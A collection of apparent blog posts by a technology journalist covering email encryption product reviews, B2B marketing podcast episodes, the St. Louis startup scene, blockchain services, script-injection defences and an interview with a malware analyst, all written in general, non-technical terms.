Email encryption has become almost frictionless

As you loyal readers know (I guess that should just be “readers” since that implies some of you are disloyal), I have been using and writing about email encryption for two decades. It hasn’t been a bowl of cherries, to be sure. Back in 1998, when Marshall Rose and I wrote our landmark book “Internet Messaging,” we said that the state of secure Internet email standards and products is best described as a sucking chest wound.” Lately I have seen some glimmers of hope in this much-maligned product category.

Last week Network World posted my review of five products. Two of them I reviewed in 2015: HPE/Voltage Secure Email and Virtru Pro The other three are Inky (an end-to-end product), Zix Gateway, and Symantec Email Security.cloud. Zix was the overall winner. We’ll get to the results of these tests in a moment.

In the past, encryption was frankly a pain in the neck. Users hated it, either because they had to manage their own encryption key stores or had to go through additional steps to encrypt and decrypt their message traffic. As a consequence, few people used it in their email traffic, and most did under protest. One of the more notable “conscientious objectors” was none other than the inventory of PGP himself, Phil Zimmerman. In this infamous Motherboard story, the reporter tried to get him to exchange encrypted messages. Zimmerman sheepishly revealed that he was no longer using his own protocols, due to difficulties in getting a Mac client operational.

To make matter worse, if a recipient wasn’t using the same encryption provider as you were using, sending a message was a very painful process. If you had to use more than one system, it was even more trouble. I think I can safely say that these days are soon coming to an end, where encryption is almost completely frictionless.

By that I mean that there are situations where you don’t have to do anything, other than click on your “send” button in your emailer and off the message goes. The encryption happens under the covers. This means that encryption can be used more often, and that means that companies can be more secure in their message traffic.

This comes just in time, as the number of hacks with emails is increasing. And it is happened not only with email traffic, but with texting/instant message chats as well. Last week Checkpoint announced a way to intercept supposedly encrypted traffic from What’s App, and another popular chat service Confide was also shown to be subject to impersonation attacks.

So will that be enough to convince users to start using encryption for normal everyday emailing? I hope so. As the number of attacks and malware infections increase, enterprises need all the protection that they can muster and encrypting emails is a great place to start.

What I liked about Zix and some of the other products that I tested this time around was that they took steps to hide the key management from the users. Zimmerman would find this acceptable, to be sure. Some other products have come close to doing this by using identity-based encryption, which makes it easier to on-board a new user into their system with a few simple mouse clicks.

I also found intriguing is how Zix and others have incorporated data loss prevention (DLP) and detection into their encryption products. What this means is that all of these systems detect when sensitive information is about to be transmitted via email, and take steps to encrypt or otherwise protect the message in transit and how it will ultimately be consumed on the receiving end.

DLP has gone from something “nice to have” to more essential as part of business compliance and data leak hacks, both of which have increased its importance. Having this integration can be a big selling point of making the move to an encrypted email vendor, and we are glad to see this feature getting easier to use and to manage in these products.

Finally, the products have gotten better at what I call multi-modal email contexts. Users today are frequently switching from their Outlook desktop client to their smartphone email app to a webmailer for keeping track of their email stream. Having a product that can handle these different modalities is critical if it is going to make a claim towards being frictionless.

So why did Zix win? It was easy to install and manage, well-documented and had plenty of solid encryption features (see the screenshot here). It’s only downside was no mobile client for composing encrypted messages, but it got partial credit for having a very responsive designed webmailer that worked well on a phone’s small screen. Zix also includes its DLP features as part of its basic pricing structure, another plus.

We have come a long way on the encrypted email road. It is nice to finally have something nice to say about these products after all these years.

FIR B2B #69 podcast: Fighting comment trolls and tracking CMO spending trends

We start off by exploring how to fight comment-trolling. While trolls have been around since before the dawn of the internet, it seems we have few ways to fight them and restore civility, or at least move towards some semblance of it. A story on Neiman Lab’s blog tell how as Norwegian site is “taking the edge off rant mode” by making readers pass a quiz before commenting. Their theory is that if readers actually read an article and prove that they understand the basic issues, their comments will be more meaningful. It is a nice start. (see screenshot here)

Then there is this new protocol from Google that harnesses machine learning techniques to help publishers thwart abusive comments online. Google has published an API and has a demonstration on its website that shows you how you can use it. Paul and David debate whether it is safe to turn on comments on your own blog, and recommend some kind of human oversight to keep things on point. Sadly, you still have to fight off the trolls for now.

Our next item comes from Shel, who pointed out a survey that shows 80% of B2B companies overlook customer renewal messaging. We don’t understand why this very important audience continues to be overlooked by marketers. There is this tidbit: 42% of respondents say their companies invest less than 10% of their marketing budgets on renewal messaging efforts. “Research shows the story you need to tell to protect existing customer relationships is actually the antithesis of the disruptive, attention-grabbing story you need to tell to acquire net new customers.” 

Finally, we examine the latest Fuqua/Duke Biz school CMO survey. It found that spending on marketing analytics is expected to leap from 4.6% to almost 22% of marketing budgets in the next three years. But marketers say barely a third of available data is used because managers lack the tools to measure the success of analytics and people who can link the data to marketing practice. We opine on why this is so and why social media continues to be stuck in a perennial “almost ready” status.   

You can listen to our 17 minute podcast here:

How St. Louis has become a startup mecca

Over the past several years, St. Louis has been recognized by a number of national publications as one of the fastest growing startup locations in the country. Having lived here for more than a decade, I have observed this first-hand, working as a volunteer mentor to dozens of new ventures as part of the IT Entrepreneur’s Network (ITEN). I had a chance recently to interview many of the founders of new companies and thought I would provide a few insights into why my adopted city has taken a leadership position in the startup world.

One reason is certainly an expanding ecosystem to support entrepreneurs. There is a critical mass of mentors, potential founders, funders, and startup-oriented resources that continues to feed on itself. Ten years ago, there weren’t many organizations or resources for startups. That has changed dramatically.

Another reason is that the cost of living here is low, especially when compared to both coasts. “It is less expensive to make the mistakes that you are inevitably going to make, and the range of people invested in your success is huge,” said Mark Sawyier, who launched his company Bonfyre in 2011. “The only thing you know for sure about your initial business plan is that is wrong. You have to be flexible and adaptable and have a greater appreciation for getting advice. The way a business responds to failure isn’t a single moment in time, but how they can retain what they have learned from that experience and move on.”

The coasts do offer some advantages, however. “Coastal investors are more comfortable with a SaaS model than their midwestern counterparts. But they also need you to be at a certain level of scale,” says Chris Deck, who has run his own ecommerce venture for almost 20 years. “The challenge to being in St. Louis is that the model to raise funds from the tech perspective is different, and you spend a lot of time talking about metrics that aren’t applicable to the SaaS business model.” Some startups have a hybrid hiring model, and ended up having salespeople based in the Bay Area just for this reason, but still have the remainder of their staff here.

Another reason why St. Louis is rising is because it is getting easier to find local talent. While that used to be more difficult, many of the founders I spoke to no longer had that issue. Sawyier said, “There is this misconception that there isn’t any local talent in St. Louis. That is not true at all. It amazes me that people are always surprised at the concentration of IT-related organizations around the area. These businesses are continually creating talent and new opportunities.”

One way to track the growth of the ecosystem is in the number of co-working spaces around the region. When I first arrived, there were none, now there are at least 20 and new ones are popping up regularly. Most of the spaces are operating at near capacity, and what is more important than the number of offices is that many companies have outgrown their initial space and have moved into new offices, with some even buying their own buildings.

Another is the sheer dollars that local funds are investing in startups. The amount has risen over the past several years, and while it isn’t at the level of a Austin, Boston, or Sand Hill Rd., it is enough to motivate many founders to relocate here for their business.

One of the ITEN programs that I have been involved with is called Mock Angels. A founder pitches his business as if he or she were appearing before a group of VCs, and afterwards they comment on the pitch and what can be improved. The theory is that this helps refine the pitch so when a real VC is at the receiving end the founder will be prepared and get funding. This isn’t unique to St. Louis: they can be found in other places. But what is different is that the Mock Angels do more than just carp about the slide deck. What I have seen is that these meetings are a good jumping off point for many founders to receive intensive mentoring from the Angels: one startup ended up talking to 20 different mentors to get a better take on what to do next.

As an example, let’s look at the story of Focalcast, a startup that provides live collaboration among tablet computers. They began by being accepted into the Capital Innovators accelerator program and moved to the St. Louis area. Then they came to ITEN and graduated from Mock Angels, and then got an Arch Grant and additional funding from the Missouri Technology Corporation. With each agency, they improved their pitch, refined their product offering, interacted with potential investors, mentors, and other specialists. “We couldn’t have gotten as far as we did without all this support from the various St. Louis programs,” said Devin Turner, their CEO. “All of them were instrumental in our success, and we have enormous respect for the St. Louis startup ecosystem. Each of these programs complements the others and works well for startups. We think St. Louis is a pretty special place and is a really great place for a young company to be located.” Turner’s pitch was torn up at his first Mock Angel session. “But we ended up working with one of the participants who went from saying that our business model didn’t make any sense to being a big advocate and a huge help for us to go to market and raise funds.”

As another example, look at Amanda Patterson, the CEO of a health-care training-related startup called The Call List. She received a great deal of mentoring from the folks she met at ITEN. “I was able to refine my business plan and introduce myself to people in the healthcare community that could apply my technology. When I first applied, I thought of Mock Angels as more of a gateway that I needed to pass through so I could apply for venture funding, but I realized that it is a way to develop a sustainable model and to train me to become a better business leader. Even the mentors that were the most negative about my pitch had useful thoughts that helped shape my business.”

Another company that benefited from the local startup scene is Label Insight. They provide a database of food ingredients for a variety of vendors. “Before we came to St. Louis, we were mostly working out of our garages and on our own,” said Anton Xavier, one of their co-founders. “We really needed to put our company on steroids and grow into a real viable business. We found St. Louis an ideal place for this growth, and the second we came into contact with the startup ecosystem here, we flourished and were able to escalate our growth.”    

St. Louis has really blossomed as a startup mecca. When I first got here, it was a rare week that had any startup-related event, and it was easy to attend most of them and get to know the community. Now there are numerous events each evening, a testimonial to how rich a community we have invented.

You can check out the Tech Startup Report from ITEN here if you want to read more about ITEN’s services and the St. Louis tech startup scene.

Network World review: Email encryption products are improving

Email encryption products have made major strides since I last looked at them nearly two years ago in this review for Network World. This week I had an opportunity to revisit these products, and found that they have gotten easier to use and deploy, thanks to a combination of user interface and encryption key management improvements. They are at the point where encryption can almost be called effortless on the part of the end user.

I reviewed five products: the two that I reviewed in 2015 (HPE/Voltage Secure Email and Virtru Pro) and three others (Inky, Zix Gateway, and Symantec Email Security.cloud). The overall winner was Zix (shown here). It was easy to install and manage, well-documented, and the encryption features were numerous and solid. The only drawback was that Zix lacks a separate mobile client to compose messages, but having a very responsive mobile web app made up for most of this issue.

You can read the complete review in Network World here, and you can watch a screencast video comparing how three of the products handle data leak protection:

FIR B2B Podcast #68: We are feeling grumpy today

This week Paul is crabby because of some bad PR experiences. He had an interview with one company that probably had seen “All the President’s Men” too many times and was confused about when something can go on background or off the record. Once something has been said, it is on the record.

Another all-too-common tactic is to send multiple follow up emails, “hope you had a nice weekend” (it is Tuesday, thank you very much) “and check back with you.” Really?

In the news last week was the Amazon S3 outage. Paul got several emails with offers of sources to comment on the dire state of affairs of the Internet. (Didn’t you know? Neither did we.)

To round out our sourpuss series, we have this report from the DC-based policy think tank called the Information Technology and Innovation Foundation. The study shows the tenor of tech reporting has become more pessimistic over the years, with a number of contributing factors such as more realistic understanding about the effects of tech, more sensationalist headlines, or just more people (including some news organizations) who want to use tech threats for their own particular purposes.

The rise of blockchain-as-a-service

With the announcement last week of the Enterprise Ethereum Alliance, it is timely to look at what is going on with blockchain technologies. The Alliance was formed to try to encourage a hybrid kind of blockchains with both public and private aspects. Its members include both cutting-edge startups along with established computer vendors such as Microsoft and major banks such as ING and Credit Suisse. As mentioned in this post by Tom Ding, a developer at String Labs, the Alliance could bring these disparate organizations together and find best-of-breed blockchain solutions that could benefit a variety of corporate development efforts.

When Bitcoin was invented, it was based on a very public blockchain database, one in which every transaction was open to anyone’s inspection. A public chain also allows anyone to create a new block, as long as they follow the protocol specs. But as blockchains matured, enterprises want something a bit more private, to have better control over the transactions for their own purposes and to control who is trusted to make new blocks.

This isn’t a mutually exclusive decision, and what is happening now is that many blockchain solutions use aspects from both public and private perspectives, as you can see from this infographic from Let’s Talk Payments.

You want the benefits of having multiple programmers hammering against an open source code base, with incentives for the blockchain community to improve the code and the overall network effects as more people enter this ecosystem. You also gain efficiencies as the number of developers scales up, and perhaps have future benefits where there is interoperability among the various different blockchain implementations. At least, that is theory espoused in a recent post on Medium here, where R Tyler Smith writes: “One thing that blockchains do extremely well is allow entities who do not trust one another to collaborate in a meaningful way.”

The Ethereum Alliance is just the latest milepost that blockchains are becoming more potentially useful for enterprise developers. Over the past year, several blockchain-as-a-service (BaaS) offerings have been introduced that make it easy to create your own blockchain with just a few clicks. Back in November 2015, Microsoft and ConsenSys built the first BaaS on top of Azure and now have several blockchain services available there. IBM followed in February 2016 with their own BaaS offering on BlueMix. IBM has a free starter plan that you can experiment with before you start spending serious money on their cloud implementations. Microsoft’s implementation is through its Azure Marketplace. There is no additional charge for blockchain services other than the cloud-based compute, network and storage resources used.

IBM’s BlueMix isn’t the only place the vendor has been active in this area: the company has been instrumental in supporting open source code regarding blockchain with large commitments to the Apache Hyperledger project. Not to be left out of things, the Amazon Web Services marketplace offers two blockchain-related service offerings. Finally, Deloitte has its own BaaS service offering as part of its Toronto-based blockchain consulting practice.
If you want to get started with BaaS, here is just one of numerous training videos that are available on the Microsoft virtual academy that covers the basics. There is also this informative white paper that goes into more details about how to deploy the Microsoft version of BaaS. IBM also has an informative video on some of the security issues you should consider here. (reg. req.)

Security Intelligence blog: Making the Move to an All-HTTPS Network

Many website operators have wrestled with the decision to move all their web infrastructure to support HTTPS protocols. The upside is obvious: better protection and a more secure pathway between browser and server. However, it isn’t all that easy to make the switch. In this piece that I wrote for IBM’s Security Intelligence blog, I bring up the case study of The Guardian’s website and what they did to make the transition. It took them more than a year and a lot of careful planning before they could fully support HTTPS.

Block that script!

It used to be so simple to understand how a web browser and a web server communicated. The server held a bunch of pages of HTML and sent them to the browser when a user would type in a URL and navigate to that location. The HTML that was sent back to the browser was pretty much human-readable, which meant anyone with little programming knowledge and a basic knowledge of command syntax could figure out what is going on in the page.

I can say this because I remember learning HTML code in those early days in a few days’ time. While I am not a programmer, I have written code in the distant past.

Those days (both me doing any code or parsing web pages) are so over now. Today’s web servers do a lot more than just transmit a bunch of HTML. They consolidate a great deal of information from a variety of sources: banners from ad networks, images from image headers that are used in visitor analytics, tracking cookies for eCommerce sites (so they can figure out if you have been there before), content distribution network codes and many more situations.

Quite frankly, if you look at all the work that a modern web server has to do, it is a wonder that any web page ends up looking as good as it does. But this note isn’t just about carping on this complexity. Instead, it is because of this complexity that the bad guys have been exploiting it for their own evil ways for many years, using what are called script injection techniques.

Basically what is happening is because of poorly written code on third-party websites or because of clever hacking techniques, you can inject malware into a web page that can do just about anything, including gathering usernames and passwords without the browser’s knowledge.

One type of injection, SQL injection, is usually near the top of the list of most frequent attacks year after year. This is because it is easy to do, it is easy to find targets, and it gets big results fast. It is also easy to fix if you can convince your database and web developers to work together.

But there is another type of injection that is more insidious. Imagine what might happen if an ad network server would be compromised so that it could target a small collection of users and insert a keylogger to capture their IDs and passwords. This could easily become a major data breach.

A variety of security tools have been invented to try to stop these injections from happening, including secure browsers (such as Authentic8.com), using various sandboxing techniques (such as Checkpoint’s Sandblast), running automated code reviews (such as with runtime application self-protection techniques from Vasco and Veracode), or by installing a browser extension that can block specific page content. None of these is really satisfactory or a complete solution.

If you are concerned about these kinds of injections, you might want to experiment with a couple of  browser extensions. These are not new. Many of these tools were created years ago to stop pop-up ads from appearing on your screen. They have gotten new attention recently because many ad networks want to get around the ad blockers (so they can continue to make money selling ads). But you can use these tools to augment your browser security too. If you are interested in trying one of them out, here is a good test of a variety of ad blocker performance done several years ago. There is another comparative review by LifeHacker which is also several years old that focuses on privacy features.

I was interested so I have been running two of these extensions lately: Privacy Badger (shown here) and Ghostery. I wanted to see what kind of information they pick up and exactly how many third-parties are part of my web transactions when I do my banking, buy stuff online, and connect to the various websites that I use to run my life. The number will surprise you. Some sites have dozens of third-party sites contributing to their pages.

Privacy Badger is from the Electronic Frontier Foundation, and is focused on the consumer who is concerned about his or her online privacy. When you call it up onscreen, it will show you a list of the third-party sites and has a simple three-position slider bar next to each one: you can block the originating domain entirely, just block its cookies, or allow it access. Ghostery works a bit differently, and ironically (or unfortunately) wants you to register before it provides more detailed information about third party sites. It provides a short description of the ad network or tracking site that it has discovered from reading the page you are currently browsing. The two tools cite different sites in their reports.

There are some small signs of hope on the horizon. An Israeli startup called Source Defense is in beta; they will secure your website from malicious third-party script injections such as keylogger insertions. I saw a short demo of it and it seems promising. Browsers are getting better, with more control over pop-ups and third-party cookies and blocking more obvious malware attacks. Although as browser security controls become more thorough, they also become more difficult to use. It is the nature of the Internet that security will always chase complexity.

FIR B2B podcast #67: Is it Time to Kill the Term ‘Content Marketing?’

In a recent LinkedIn post, Kyle Cassidy proposed Why ‘Content Marketing’ Needs to be Killed Dead and Buried Deep. Cassidy is a former ad agency content marketer who has grown tired of the term and wants to see it retired. His well-written – and somewhat tongue-in-cheek – post gives some solid reasons why the term should be put out of its misery, including over-inclusive usage that renders it meaningless, not unlike the cutesy names that are now applied to departments that used to be called “personnel” and “marketing.” Given that our hosts both come from a long-standing journalism tradition in which the quality of our words was Job #1, he does have some salient points to consider.

I had an opportunity to discuss this on a recent podcast that I do with Paul Gillin here. If you don’t know Paul, he is cut from the same cloth as I: a long-time technology journalist who has started numerous pubs and websites and has written several books.

Cassidy writes about the “hot mess of skills” that can be found in the typical content marketer, who as he says is “a steaming pile of possibility” that combines “a savvy copywriter, editor, and brand strategist” all rolled up into one individual. True enough: you need a lot of skills to survive these days. But one skill that he just briefly mentions is something that both Paul and I have in spades.  We consider ourselves journalists first and marketing our “content” a distant second.

Cassidy has a good point: “Content Marketing is a meaningless term. PR is content. Product is content. Blogs and social are content. Emails are content. Direct mail is content.” Yes, but. Not all content is created equal. Some content is based on facts, and some isn’t. Without a solid foundation in determining facts you can’t market anything, whether it is content or the latest music tracks. You have to speak truth to power, as the old Quaker saying goes.

Of course, fact-based journalism – what we used to call just “journalism” – is under siege as well these days, given the absence and abuse of facts that is streaming live every day from our nation’s capital. The notions of fake news – what we used to call rumors, exaggerations, lies and misleading statistics – is also rife and widespread. And even the New York Times seems to have trouble finding the right person to quote recently.

Part of me wants to assign blame to content marketers for these trends. But the real reason is just laziness on the part of writers, and the lack of any editors who in the olden days – say ten years ago – used to work with them to sharpen their writing, find these lazy slips of the keyboard, and hold their fingers to the fire to make sure they checked their quotes, found another source, deleted unsupported conclusions and the like. I still work with some very fine editors today, and they are uncanny how quickly they can zoom in on a particular weak spot in my prose. Even after years of writing and thousands of stories published, I still mess up. It isn’t (usually) deliberate: we all make mistakes. But few of us can find and fix them. Part of this is the online world we now inhabit.

But if the online world has decimated journalists, it really has taken its toll on editors who are few and infrequently seen. Few publications want to take the time to pass a writer’s work through an editor: the rubric is post first, fix later. Be the first to get something “out there,” irregardless (sic.) of its accuracy. As I said, you can’t be your own editor, no matter how much experience you might have and how many words a week you publish. You need a second (and third) pair of eyes to see what you don’t.

When I first began in tech journalism in the mid-1980s, we had an entire team of copy editors working at “the desk,” as it was called. The publication I was working for at the time was called PC Week, and we put the issue to bed every Thursday night. No matter where in the world you were, on Thursday nights you had to be near a phone (and this was the era before cell phones were common).  You invariably got a call from the desk about something that was awry with your story. It was part of the job.

Several years ago, I was fortunate to do freelance work for the New York Times. It was a fun gig, but it wasn’t an easy one. By the time my stories would be published in the paper, almost every word had been picked over and changed.  Some of these changes were so subtle that I wouldn’t have seen them if the track changes view wasn’t turned on. A few (and very few) times, I argued with the copy desk over some finer point. I never thought that I would miss either of those times. They seem like quaint historical curiosities now.

So let’s kill off the term content marketing, but let’s also remember that if we want our content to sing, it has to be true, fact-based, and accurate. Otherwise, it is just the digital equivalent of a fish wrapper.

Going back to our podcast, Paul and I next pick up on the dust-up between Crowdstrike and NSSLabs over a test of the former’s endpoint security products. Crowdstrike claims NSS tests didn’t show its product in the best light and weren’t ‘authorized’ to review it. It’s even taken NSS to court. Our view: too bad. If you don’t like the results, shame on you for not working more closely with the testers. And double shame for suing them. David has been on the other end of this scenario for a number of years and offers an inspiring anecdote about how a vendor can turn a pig’s ear into a silken test. Work with the testing press, and eventually, you too can turn things around to benefit both of you.

Finally, we bring up the issue of a fake tweet being used by the New York Times and Newsmax in regards to the firing of National Security Adviser Michael Flynn earlier this week. The Times eventually posted a correction, but if the Grey Lady of journalism can be fooled, it brings up questions of how brands should work with parody or unauthorized social media accounts. Lisa Vaas has a great post on Naked Security that provides some solid suggestions on how to vet accounts in the future: Look for the blue verification check mark, examine when the account was created and review the history of tweets.

You can listen to our podcast (23 min) here:

Lenny Zeltser is teaching us how malware operates

Lenny Zeltser has been teaching security classes at SANS for more than 15 years now and has earned the prestigious GIAC Security Expert professional designation. He is not some empty suit but a hands-on guy who developed the Linux toolkit REMnux that is used by malware analysts throughout the world. He is frequently quoted in the security trades and recently became VP of Products of Minerva Labs and spoke to me about his approach to understanding incident response, endpoint protection and digital forensics.

“I can’t think about malware in the abstract,” he said. “I have to understand it in terms of its physical reality, such as how it injects code into a running process and uses a command and control network. This means I have to play with it to learn about it.”

“Malware has become more elaborate over the past decade,” he said. “It takes more effort to examine it now. Which is interesting, because at its core it hasn’t changed that much. Back a decade or so, bots were using IRC as their command and control channel. Now of course there is much more HTTP/HTTPS-based connections.”

One interesting trend is that “malware is becoming more defensive, as a way to protect itself from analysis and automated tools such as sandboxes. This makes sense because malware authors want to derive as much value as they can and try to hide from discovery. If a piece of malware sees that it is running or a test machine or inside a VM, it will just shut down or go to sleep.”

Why has he made the recent move to working for a security vendor? “One reason is because I want to use the current characteristics of malware to make better protective products,” he said. Minerva is working on products that try to trick malware into thinking that they are running in sandboxes when they are sitting on user’s PCs, as a way to shut down the infection. Clever. “Adversaries are so creative these days. So two can play that game!”

Another current trend for malware is what is called “fileless,” or the ability to store as little as possible in the endpoint’s file system. While the name is somewhat misleading – you still need something stored on the target, whether it be a shortcut or a registry key – the idea is to have minimal and less obvious markers that your PC has been infected. “Something ultimately has to touch the file system and has to survive a reboot. That is what we look for.”

Still, no matter how sophisticated a piece of malware is, there is always user error that you can’t completely eliminate. “I still see insiders who inadvertently let malware loose – maybe they click on an email attachment or they let macros run from a Word document. Ultimately, someone is going to try to run malicious code someplace, they will get it to where they want to.”

“People realize that threats are getting more sophisticated, but enterprises need more expertise too, and so we need to train people in these new skills,” he said. One challenge is being able to map out a plan post-infection. “What tasks do you perform first? Do you need to re-image an infected system? You need to see what the malware is doing, and where it has been across your network, before you can mitigate it and respond effectively,” he said. “It is more than just simple notification that you have been hit.”

I asked him to share one of his early missteps with me, and he mentioned when he worked for a startup tech company that was building web-based software. The firm wanted to make sure their systems were secure, and paid a third-party security vendor to build a very elegant and complex series of protective measures. “It was really beautiful, with all sorts of built-in redundancies. The only trouble was we designed it too well, and it ended up costing us an arm and a leg. We ended up overspending to the point where our company ran out of money. So it is great to have all these layers of protection, but you have to consider what you can afford and the business impact and your ultimate budget.”

Finally, we spoke about the progression of technology and how IT and security professionals are often unsure when it comes to the shock of the new. “First there was vLANs,” he said. “Initially, they were designed to optimize network performance and reduce broadcast domains. And they were initially resisted by security professionals, but over time they were accepted and used for security purposes. The same thing initially happened with VMs and cloud technologies. And we are starting to see containers become more accepted as security professionals get used to them. The trick is to stay current and make sure the tools are advancing with the technology.”

Like what you are reading?

Subscribe to Inside Security!